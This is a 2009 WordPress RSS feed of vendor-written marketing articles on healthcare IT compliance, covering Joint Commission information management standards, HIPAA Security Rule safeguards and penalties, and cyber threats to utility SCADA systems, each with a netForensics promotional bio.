<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>ADOWP &#187; kjaniszewski</title>
	<atom:link href="http://www.adowp.com/author/kjaniszewski/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.adowp.com</link>
	<description>Article Directory on WordPress</description>
	<lastBuildDate>Tue, 29 Mar 2011 02:39:21 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>TJC IM Readiness Standards 101</title>
		<link>http://www.adowp.com/internet-and-online-businesses/internet-security/tjc-im-readiness-standards-101/</link>
		<comments>http://www.adowp.com/internet-and-online-businesses/internet-security/tjc-im-readiness-standards-101/#comments</comments>
		<pubDate>Fri, 18 Dec 2009 01:56:53 +0000</pubDate>
		<dc:creator>kjaniszewski</dc:creator>
				<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[hipaa compliance]]></category>
		<category><![CDATA[hipaa compliant]]></category>
		<category><![CDATA[hipaa it]]></category>
		<category><![CDATA[hipaa it compliance]]></category>
		<category><![CDATA[hipaa security rule]]></category>

		<guid isPermaLink="false">http://www.adowp.com/?p=324</guid>
		<description><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Ftjc-im-readiness-standards-101%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Ftjc-im-readiness-standards-101%2F&#38;style=normal&#38;service_api=6cc5f3d7e034a0040236b79464e1f4fd&#38;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>The Joint Commission (TJC) is an independent, not-for-profit organization, The Joint Commission accredits and certifies more than 17,000 health care organizations and programs in the United States.</p>
<p>The TJC has recently updated and expanded its information management (IM) accreditation standards for healthcare organizations. New readiness standards for information management and IT risk management are requiring hospitals to rethink how they protect and secure sensitive information, audit, and improve continuity of operations and disaster recovery planning.</p>
<p><a href="http://www.adowp.com/internet-and-online-businesses/internet-security/tjc-im-readiness-standards-101/" class="more-link">Read more on TJC IM Readiness Standards 101&#8230;</a></p>
]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Ftjc-im-readiness-standards-101%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Ftjc-im-readiness-standards-101%2F&amp;style=normal&amp;service_api=6cc5f3d7e034a0040236b79464e1f4fd&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>The Joint Commission (TJC) is an independent, not-for-profit organization, The Joint Commission accredits and certifies more than 17,000 health care organizations and programs in the United States.</p>
<p>The TJC has recently updated and expanded its information management (IM) accreditation standards for healthcare organizations. New readiness standards for information management and IT risk management are requiring hospitals to rethink how they protect and secure sensitive information, audit, and improve continuity of operations and disaster recovery planning.</p>
<p>To maintain and earn accreditation, organizations must have an extensive on-site review by a team of Joint Commission healthcare professionals, at least once every three years. The purpose of the review is to evaluate the organization&#8217;s performance in areas that affect care. Accreditation may then be awarded based on how well the organizations met Joint Commission standards.</p>
<p>A hospital&#8217;s IT infrastructure is at the foundation of delivering quality care. TJC recognizes this in the enhanced information management readiness standards. Among numerous other topics, TJC specifically addresses three key areas of IT risk management in the new IM standards. These include:</p>
<ol>
<li>Patient record security</li>
<li>System security from intrusion and data tampering</li>
<li>Continuity of operations and disaster recovery capabilities</li>
</ol>
<p><strong>Three Key Readiness Standards.</strong></p>
<p><strong>Plan for Continuity of IM Processes (IM.01.01.03)</strong></p>
<p>The organization must have a written plan for managing interruptions to its information processes (paper-based, electronic, or a mix of paper-based and electronic). The hospital&#8217;s plan for managing interruptions to information processes must address the following:</p>
<ul>
<li>Have a back-up of electronic information systems</li>
<li>Plan for interruptions of electronic information systems</li>
<li>Provide training for staff and licensed independent practitioners on alternate procedures to follow when electronic information systems are unavailable</li>
<li>Establish a plan to handle interruptions to information processes is tested for effectiveness according to time frames defined by the hospital</li>
<li>Implement its plan for managing interruptions to information processes to maintain access to information needed for patient care</li>
</ul>
<p><strong>Protect Privacy of Health Information (IM.02.01.01)</strong></p>
<ul>
<li>Use health information only for purposes as required by law and regulation or further limited by its policy on privacy</li>
<li>Disclose health information only by authorization from the patient or as otherwise consistent with law and regulation</li>
<li>Monitor compliance with its policy on the privacy of health information</li>
</ul>
<p><strong>Maintain Security &amp; Integrity of Health Information (IM.02.01.03)</strong></p>
<ul>
<li>Protect against unauthorized access, use, and disclosure of health information</li>
<li>Protect health information against loss, damage, unauthorized alteration, unintentional change, and accidental destruction</li>
<li>Control the intentional destruction of health information</li>
<li>Monitor compliance with its policies regarding the security and integrity of health information</li>
</ul>
<p>TJC&#8217;s move to enhance its information management readiness standards is consistent with the growing number of ID theft incidents and regulatory pressures from many government and private sources. A typical hospital, for example, is subject to HIPAA regulations, PCI compliance (credit card), and often Sarbanes Oxley.</p>
<p><strong>The Common Denominator</strong></p>
<p>Common among these regulations and other information security best practice standards is the need to protect all patient, credit card and other confidential data from intrusion, tampering, and theft – at all times.</p>
<p>Katherine Janiszewski plays a crucial role as Marketing Manager of netForensics.  Founded in 1999, netForensics is based on a culture of excellence and innovation. Their team of leading experts understands the ever-evolving security threat and compliance needs of today&#8217;s organizations, including <a href="http://sem.netforensics.com/page/1/Hipaa.jsp">HIPAA IT Compliance</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.adowp.com/internet-and-online-businesses/internet-security/tjc-im-readiness-standards-101/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Patient Information &#8211; The HIPAA Challenge</title>
		<link>http://www.adowp.com/internet-and-online-businesses/internet-security/patient-information-the-hipaa-challenge/</link>
		<comments>http://www.adowp.com/internet-and-online-businesses/internet-security/patient-information-the-hipaa-challenge/#comments</comments>
		<pubDate>Thu, 17 Dec 2009 06:58:01 +0000</pubDate>
		<dc:creator>kjaniszewski</dc:creator>
				<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[hipaa compliance]]></category>
		<category><![CDATA[hipaa compliant]]></category>
		<category><![CDATA[hipaa data]]></category>
		<category><![CDATA[hipaa it]]></category>
		<category><![CDATA[hipaa it compliance]]></category>
		<category><![CDATA[hipaa security rule]]></category>

		<guid isPermaLink="false">http://www.adowp.com/?p=312</guid>
		<description><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fpatient-information-the-hipaa-challenge%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fpatient-information-the-hipaa-challenge%2F&#38;style=normal&#38;service_api=6cc5f3d7e034a0040236b79464e1f4fd&#38;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>The Health Insurance Portability and Accountability Act (HIPAA) of 1996 has fostered the use of electronic transactions, simplifying healthcare administration and reducing overhead.</p>
<p>However, the computerization of patient records has created an increased security risk from various sources, such as intrusion attempts, unauthorized internal access and other security attacks. HIPAA therefore mandates security measures be taken to protect sensitive data, ensuring that only patients and their healthcare providers have access to patient medical information. According to the Final Rule of the Act&#8217;s Health Insurance Reform: Security Standards, HHS states:</p>
<p><a href="http://www.adowp.com/internet-and-online-businesses/internet-security/patient-information-the-hipaa-challenge/" class="more-link">Read more on Patient Information &#8211; The HIPAA Challenge&#8230;</a></p>
]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fpatient-information-the-hipaa-challenge%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fpatient-information-the-hipaa-challenge%2F&amp;style=normal&amp;service_api=6cc5f3d7e034a0040236b79464e1f4fd&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>The Health Insurance Portability and Accountability Act (HIPAA) of 1996 has fostered the use of electronic transactions, simplifying healthcare administration and reducing overhead.</p>
<p>However, the computerization of patient records has created an increased security risk from various sources, such as intrusion attempts, unauthorized internal access and other security attacks. HIPAA therefore mandates security measures be taken to protect sensitive data, ensuring that only patients and their healthcare providers have access to patient medical information. According to the Final Rule of the Act&#8217;s Health Insurance Reform: Security Standards, HHS states:</p>
<p>&#8220;Section 1173(d) of the Act provides that covered entities that maintain or transmit health information are required to maintain reasonable and appropriate administrative, physical, and technical safeguards to ensure the integrity and confidentiality of the information and to protect against any reasonably anticipated threats or hazards to the security or integrity of the information and unauthorized use or disclosure of the information. These safeguards must also otherwise ensure compliance with the statute by the officers and employees of the covered entities.&#8221;</p>
<p>The Title II Administrative Simplification Security Rule states that specific security issues related to transmitting and storing patient data must be addressed. Safeguard initiatives where solutions must be implemented include:</p>
<ul>
<li>Security Management Process</li>
<li>Administrative Safeguards</li>
<li>Assigned Security Responsibility</li>
<li>Workforce Security</li>
<li>Information Access Management</li>
<li>Security Awareness and Training</li>
<li>Security Incident Procedures</li>
<li>Contingency Plan</li>
<li>Evaluation</li>
<li>Business Associate Contracts and Other Arrangements</li>
<li>Physical Safeguards</li>
<li>Facility Access Controls</li>
<li>Workstation Use</li>
<li>Workstation Security</li>
<li>Device and Media Controls</li>
<li>Technical Safeguards</li>
<li>Access Control</li>
<li>Audit Controls</li>
<li>Integrity</li>
<li>Person or Entity Authentication</li>
<li>Transmission Security</li>
</ul>
<p>To comply with HIPAA regulations and protect patient information, healthcare organizations need to update their legacy computer systems, ramping up their information security capabilities, and defining and implementing business processes that align with security objectives.</p>
<p>The HIPAA Security Standards do not specify particular technology requirements, so each affected healthcare organization must assess its own risk and develop security measures accordingly. Organizations must then certify their security programs through self-certification or by a private accreditation entity.</p>
<p>Addressing the HIPAA Security Rule and implementing the technical, administrative, and physical safeguards that will ensure compliance requires a comprehensive information security program.</p>
<p>Katherine Janiszewski plays a crucial role as Marketing Manager of netForensics.  Founded in 1999, netForensics is based on a culture of excellence and innovation. Their team of leading experts understands the ever-evolving security threat and compliance needs of today&#8217;s organizations, including <a href="http://sem.netforensics.com/page/1/Hipaa.jsp">HIPAA Data</a>.  For more information, visit netForensics.com.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.adowp.com/internet-and-online-businesses/internet-security/patient-information-the-hipaa-challenge/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>New Threats to Utility SCADA Systems</title>
		<link>http://www.adowp.com/internet-and-online-businesses/internet-security/new-threats-to-utility-scada-systems/</link>
		<comments>http://www.adowp.com/internet-and-online-businesses/internet-security/new-threats-to-utility-scada-systems/#comments</comments>
		<pubDate>Mon, 14 Dec 2009 20:57:55 +0000</pubDate>
		<dc:creator>kjaniszewski</dc:creator>
				<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[nerc cip]]></category>
		<category><![CDATA[nerc cip standards]]></category>
		<category><![CDATA[nerc requirements]]></category>
		<category><![CDATA[netforensics]]></category>
		<category><![CDATA[scada system]]></category>
		<category><![CDATA[scada systems]]></category>

		<guid isPermaLink="false">http://www.adowp.com/?p=233</guid>
		<description><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fnew-threats-to-utility-scada-systems%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fnew-threats-to-utility-scada-systems%2F&#38;style=normal&#38;service_api=6cc5f3d7e034a0040236b79464e1f4fd&#38;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p><strong>Mission Critical Systems for the Energy Industry</strong></p>
<p>Supervisory Control and Data Acquisition (SCADA) systems that collect and manage data across a large facility from a central computer, play a major role in the utility industry, helping to manage large and diverse information loads from power plants of all types. Inter-connectivity has made these systems increasingly vulnerable to cyber attacks.</p>
<p><a href="http://www.adowp.com/internet-and-online-businesses/internet-security/new-threats-to-utility-scada-systems/" class="more-link">Read more on New Threats to Utility SCADA Systems&#8230;</a></p>
]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fnew-threats-to-utility-scada-systems%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fnew-threats-to-utility-scada-systems%2F&amp;style=normal&amp;service_api=6cc5f3d7e034a0040236b79464e1f4fd&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p><strong>Mission Critical Systems for the Energy Industry</strong></p>
<p>Supervisory Control and Data Acquisition (SCADA) systems that collect and manage data across a large facility from a central computer, play a major role in the utility industry, helping to manage large and diverse information loads from power plants of all types. Inter-connectivity has made these systems increasingly vulnerable to cyber attacks.</p>
<p><strong>The Growing Vulnerability of SCADA Systems</strong></p>
<p>The control systems for the electric grid used to operate in a stand-alone environment without computer or communication links to an external Information Technology (IT) infrastructure. Over the past fifteen years such stand-alone enclaves have been increasingly connected to both the corporate environment and the external world, and the utility SCADA systems are no exception. Computer and communication network interconnection brings with it the<br />
potential for cyber attacks on these systems by adversaries. This is a critical problem since such an attack can affect several entities across the country simultaneously. Such attacks have the enhanced potential to cause a cascading negative effect to the Bulk Power System.</p>
<p><strong>SCADA System Threats Are More Vulnerable Than Ever</strong></p>
<ul>
<li>SCADA systems are coming in line with standard networking technologies. The current generation of SCADA systems is increasingly using open system architecture to distribute functionality across a wide-area network (WAN) for communication between the master station and communications equipment.</li>
<li>SCADA systems are becoming ubiquitous. Thin clients, web portals, and web-based products are gaining popularity with most major vendors. The increased convenience of end users viewing their processes remotely introduces security considerations resulting in SCADA-based systems being vulnerable to cyber-attacks.</li>
<li>The mission-critical nature of a large number of SCADA systems makes them targets of cyber-terrorist. In a worst case scenario, failure of a SCADA system could cause massive financial losses through loss of data or actual physical destruction, misuse or theft, even loss of life, either directly or indirectly.</li>
<li>SCADA systems no longer have the benefit of security-through obscurity that may have existed in the past from the use of specialized protocols and proprietary interfaces. Increasingly, SCADA networks are being connected to the Internet.</li>
<li>Similar to other networked technologies, SCADA networks must have physical, administrative, and technical security safeguards.</li>
<li>Security and authentication in designing, deploying, and operating SCADA networks is paramount. For example, security devices such as IPS/IDS, firewalls, and other technological security measures must be deployed to help protect SCADA systems. Automated security information management solutions are also needed to help consolidate the security logs across the SCADA system wide-area network.</li>
</ul>
<p>Katherine Janiszewski plays a crucial role as Marketing Manager of netForensics. Founded in 1999, netForensics is based on a culture of excellence and innovation. Their team of leading experts understands the ever-evolving security threat and compliance needs of today&#8217;s organizations, including <a href="http://sem.netforensics.com/page/1/NERC-CIP-compliance.jsp">NERC requirements</a>. For more information, visit netForensics.com.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.adowp.com/internet-and-online-businesses/internet-security/new-threats-to-utility-scada-systems/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Key Issues in HIPAA Security Compliance Management</title>
		<link>http://www.adowp.com/internet-and-online-businesses/internet-security/key-issues-in-hipaa-security-compliance-management/</link>
		<comments>http://www.adowp.com/internet-and-online-businesses/internet-security/key-issues-in-hipaa-security-compliance-management/#comments</comments>
		<pubDate>Mon, 14 Dec 2009 20:17:11 +0000</pubDate>
		<dc:creator>kjaniszewski</dc:creator>
				<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[hipaa compliance]]></category>
		<category><![CDATA[hipaa compliant]]></category>
		<category><![CDATA[hipaa healthcare]]></category>
		<category><![CDATA[hipaa security compliance]]></category>

		<guid isPermaLink="false">http://www.adowp.com/?p=231</guid>
		<description><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fkey-issues-in-hipaa-security-compliance-management%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fkey-issues-in-hipaa-security-compliance-management%2F&#38;style=normal&#38;service_api=6cc5f3d7e034a0040236b79464e1f4fd&#38;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p><strong>A 360 Degree Approach to HIPAA Compliance</strong></p>
<p>An effective approach to meeting HIPAA security compliance requirements begins with a security management solution – one that enables real-time monitoring, compliance reporting and control management. Technology alone however, is not the answer. The best route to compliance is a 360 degree approach that integrates existing people, processes, and policies with technology. The foundation of a compliance solution for all healthcare organizations is an enterprise-class Security Information Management (SIM) solution.</p>
<p><a href="http://www.adowp.com/internet-and-online-businesses/internet-security/key-issues-in-hipaa-security-compliance-management/" class="more-link">Read more on Key Issues in HIPAA Security Compliance Management&#8230;</a></p>
]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fkey-issues-in-hipaa-security-compliance-management%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fkey-issues-in-hipaa-security-compliance-management%2F&amp;style=normal&amp;service_api=6cc5f3d7e034a0040236b79464e1f4fd&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p><strong>A 360 Degree Approach to HIPAA Compliance</strong></p>
<p>An effective approach to meeting HIPAA security compliance requirements begins with a security management solution – one that enables real-time monitoring, compliance reporting and control management. Technology alone however, is not the answer. The best route to compliance is a 360 degree approach that integrates existing people, processes, and policies with technology. The foundation of a compliance solution for all healthcare organizations is an enterprise-class Security Information Management (SIM) solution.</p>
<p><strong>Seven Critical HIPAA Initiatives</strong></p>
<p><strong>1. Policy</strong></p>
<p>Define a policy-driven security management program that can be incorporated early on into business processes – Identify the people and technology controls needed to satisfy an organization&#8217;s security mission and ensure HIPAA compliance. Also, ensure that security initiatives are integrated into business processes at their onset, rather than after the fact.</p>
<p><strong>2. Security Controls</strong></p>
<p>Validate security controls – Provide for the monitoring and reporting of controls on human actions and decisions, process controls, and information technology controls.</p>
<p><strong>3. Risk Management</strong></p>
<p>Implement a risk management approach to information security – Comprise active monitoring of risk as defined and measured by key control indicators (KCIs) and key risk indicators (KRIs), correlating the relative value of information assets, the threats to the confidentiality, integrity, and availability of the assets, and the vulnerability of the systems and architecture that store and carry the assets.</p>
<p><strong>4. Due Diligence</strong></p>
<p>Demonstrate due diligence in the application of internal controls – Create a link between the security infrastructure and policy by capturing all security events from all network hosts, devices, and assets in an auditable database.</p>
<p><strong>5. Incident Management</strong></p>
<p>Develop and implement an effective security-incident management process – Demonstrate that the proper steps were taken to correct systems and adjust policy if a non-compliant situation is identified.</p>
<p><strong>6. Reporting</strong></p>
<p>Enable reporting that can help demonstrate compliance – Demonstrate the ongoing security of compliance-related assets over a period of<br />
time, recreating the organization&#8217;s security posture if needed to obtain HIPAA certification, and enabling security performance management against metrics that can be leveraged for corporate governance initiatives.</p>
<p><strong>7. Preserving Data</strong></p>
<p>Establish capabilities for archiving and preserving data – Preserve near-term and long-term data in its purest form for forensics and evidentiary presentation. By leveraging SIM to implement effective, comprehensive policies and procedures for establishing accountability and consistent reporting practices, healthcare organizations can successfully meet HIPAA regulatory compliance directives.</p>
<p><strong>Example: Security Information Management and HIPAA Compliance</strong></p>
<p>Wheaton Franciscan Healthcare a nonprofit healthcare organization based in Wheaton, Illinois needed to enhance their visibility into network security and improve reporting capabilities to enable HIPAA compliance. The organization size created enormous challenges.</p>
<p>With 17 hospitals and more than 70 clinics in Colorado, Illinois, Iowa, and Wisconsin, the initiative involved nearly100 security devices, including firewalls, intrusion protection systems, virtual private network concentrators, and authentication services..The organization manually reviewed many of its security devices, though some were unmanageable due to the enormous volume of event log data. Wheaton turned to a leading Security Information Management solution to bring its security initiatives under control.</p>
<p>Wheaton was able to reduce its monitoring workload and minimize downtime by leveraging this solution to react more quickly to threats. With improved visibility into the network and the ability to assess its risk posture at any given point in time, Wheaton raised security and reporting to the level required for HIPAA compliance.</p>
<p>Katherine Janiszewski plays a crucial role as Marketing Manager of netForensics. Founded in 1999, netForensics is based on a culture of excellence and innovation. Their team of leading experts understands the ever-evolving security threat and compliance needs of today&#8217;s organizations, including <a href="http://sem.netforensics.com/page/1/Hipaa.jsp">HIPAA Compliance</a>. For more information, visit netForensics.com.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.adowp.com/internet-and-online-businesses/internet-security/key-issues-in-hipaa-security-compliance-management/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HIPAA Compliance 101</title>
		<link>http://www.adowp.com/internet-and-online-businesses/internet-security/hipaa-compliance-101/</link>
		<comments>http://www.adowp.com/internet-and-online-businesses/internet-security/hipaa-compliance-101/#comments</comments>
		<pubDate>Mon, 14 Dec 2009 20:13:00 +0000</pubDate>
		<dc:creator>kjaniszewski</dc:creator>
				<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[hipaa compliance]]></category>
		<category><![CDATA[hipaa compliant]]></category>
		<category><![CDATA[hipaa it]]></category>
		<category><![CDATA[hipaa it compliance]]></category>
		<category><![CDATA[hipaa security rule]]></category>

		<guid isPermaLink="false">http://www.adowp.com/?p=229</guid>
		<description><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fhipaa-compliance-101%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fhipaa-compliance-101%2F&#38;style=normal&#38;service_api=6cc5f3d7e034a0040236b79464e1f4fd&#38;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>The Health Insurance Portability and Accountability Act (HIPAA) has changed the healthcare information security landscape in the U.S. Compliance has become a critical issue for all organizations that come in contact with health information.  Here is a summary the HIPAA basics.</p>
<p><a href="http://www.adowp.com/internet-and-online-businesses/internet-security/hipaa-compliance-101/" class="more-link">Read more on HIPAA Compliance 101&#8230;</a></p>
]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fhipaa-compliance-101%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fhipaa-compliance-101%2F&amp;style=normal&amp;service_api=6cc5f3d7e034a0040236b79464e1f4fd&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>The Health Insurance Portability and Accountability Act (HIPAA) has changed the healthcare information security landscape in the U.S. Compliance has become a critical issue for all organizations that come in contact with health information.  Here is a summary the HIPAA basics.</p>
<p>HIPAA, also known as the Kennedy-Kassebaum Act, was signed into law by the U.S. Congress in 1996 to establish health insurance reform and healthcare administrative simplification for various healthcare entities including: health plans, healthcare clearinghouses such as billing services and community health information systems, and healthcare providers that transmit healthcare data in a way that is regulated by HIPAA.</p>
<p>Governed by HHS, HIPAA Title I supports the continuation of health insurance coverage for workers and their families when they change or lose their jobs. Title II defines numerous offenses relating to healthcare and healthcare-related information and sets civil and criminal penalties for agencies that fail to abide by HIPAA standards.</p>
<p>The most significant provisions of Title II for IT organizations are its Administrative Simplification rules. Per the requirements of Title II, HHS has established five rules regarding Administrative Simplification:</p>
<ul>
<li>Privacy Rule</li>
<li>Transactions and Code Sets Rule</li>
<li>Security Rule</li>
<li>Unique Identifiers Rule</li>
<li>Enforcement Rule</li>
</ul>
<p>Various security standards apply to each of these rules, particularly for the Security Rule, which establishes three main security objectives: Administrative Safeguards, Physical Safeguards, and Technical Safeguards.  Each safeguard area includes both required and addressable implementation specifications. Required specifications must be adopted and administered as dictated by the rule.</p>
<p>Addressable specifications are more flexible. Yet according to the rules for both required and addressable specifications, how organizations satisfy individual security requirements and which technology they choose are left to the business decisions of each entity.</p>
<p>Healthcare organizations face fines for noncompliance with HIPAA regulations. Penalties include the following: general fines of up to $25,000 per incident, as well as up to $50,000, imprisonment for not more than one year, or both for wrongful disclosure of individually identifiable health information.</p>
<p><strong>HIPAA Fines are Real</strong></p>
<p>In July 2008, HHS announced a formal action against Providence Health &amp; Services.  HHS required Providence to pay $100,000 and implement a detailed Corrective Action Plan to ensure that it will appropriately safeguard identifiable electronic patient information against theft or loss.</p>
<p>This case emphasizes that there is a renewed interest in HIPAA and sends a clear message that HHS has the authority and intent to take enforcement action. This has been a debate of sorts ever since the passage of HIPAA. These matters are frequently resolved on a consultative basis with HHS Office of Civil Rights (OCR).They prefer to work with the healthcare organization to resolve problems.  The HHS Office of Inspector General (OIG), however, has been critical of HHS&#8217; lack of enforcement activity in the past. Providence is an example that shows HHS can and will act for HIPAA violations.</p>
<p>Katherine Janiszewski plays a crucial role as Marketing Manager of netForensics.  Founded in 1999, netForensics is based on a culture of excellence and innovation. Their team of leading experts understands the ever-evolving security threat and compliance needs of today&#8217;s organizations, including <a href="http://sem.netforensics.com/page/1/Hipaa.jsp">HIPAA IT Technology</a>.  For more information, visit netForensics.com.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.adowp.com/internet-and-online-businesses/internet-security/hipaa-compliance-101/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>HIPAA &#8211; Project Patient Information</title>
		<link>http://www.adowp.com/internet-and-online-businesses/internet-security/hipaa-project-patient-information/</link>
		<comments>http://www.adowp.com/internet-and-online-businesses/internet-security/hipaa-project-patient-information/#comments</comments>
		<pubDate>Mon, 14 Dec 2009 03:23:14 +0000</pubDate>
		<dc:creator>kjaniszewski</dc:creator>
				<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[hipaa compliance]]></category>
		<category><![CDATA[hipaa compliant]]></category>
		<category><![CDATA[hipaa data]]></category>
		<category><![CDATA[hipaa it]]></category>
		<category><![CDATA[hipaa it compliance]]></category>
		<category><![CDATA[hipaa security rule]]></category>

		<guid isPermaLink="false">http://www.adowp.com/?p=203</guid>
		<description><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fhipaa-project-patient-information%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fhipaa-project-patient-information%2F&#38;style=normal&#38;service_api=6cc5f3d7e034a0040236b79464e1f4fd&#38;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>A fundamental benefit of HIPAA is that it encourages the wider use of electronic transactions, greatly simplifying healthcare administration and reducing administrative overhead costs.</p>
<p>Yet with the computerization of patient medical records, healthcare organizations face an increased security risk from various sources, such as unauthorized internal access, intrusion attempts, and other security attacks. HIPAA therefore mandates security measures be taken to protect this sensitive data, ensuring that only patients and their healthcare providers have access to patient medical information. According to the Final Rule of the Act&#8217;s Health Insurance Reform: Security Standards, HHS states:</p>
<p><a href="http://www.adowp.com/internet-and-online-businesses/internet-security/hipaa-project-patient-information/" class="more-link">Read more on HIPAA &#8211; Project Patient Information&#8230;</a></p>
]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fhipaa-project-patient-information%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.adowp.com%2Finternet-and-online-businesses%2Finternet-security%2Fhipaa-project-patient-information%2F&amp;style=normal&amp;service_api=6cc5f3d7e034a0040236b79464e1f4fd&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>A fundamental benefit of HIPAA is that it encourages the wider use of electronic transactions, greatly simplifying healthcare administration and reducing administrative overhead costs.</p>
<p>Yet with the computerization of patient medical records, healthcare organizations face an increased security risk from various sources, such as unauthorized internal access, intrusion attempts, and other security attacks. HIPAA therefore mandates security measures be taken to protect this sensitive data, ensuring that only patients and their healthcare providers have access to patient medical information. According to the Final Rule of the Act&#8217;s Health Insurance Reform: Security Standards, HHS states:</p>
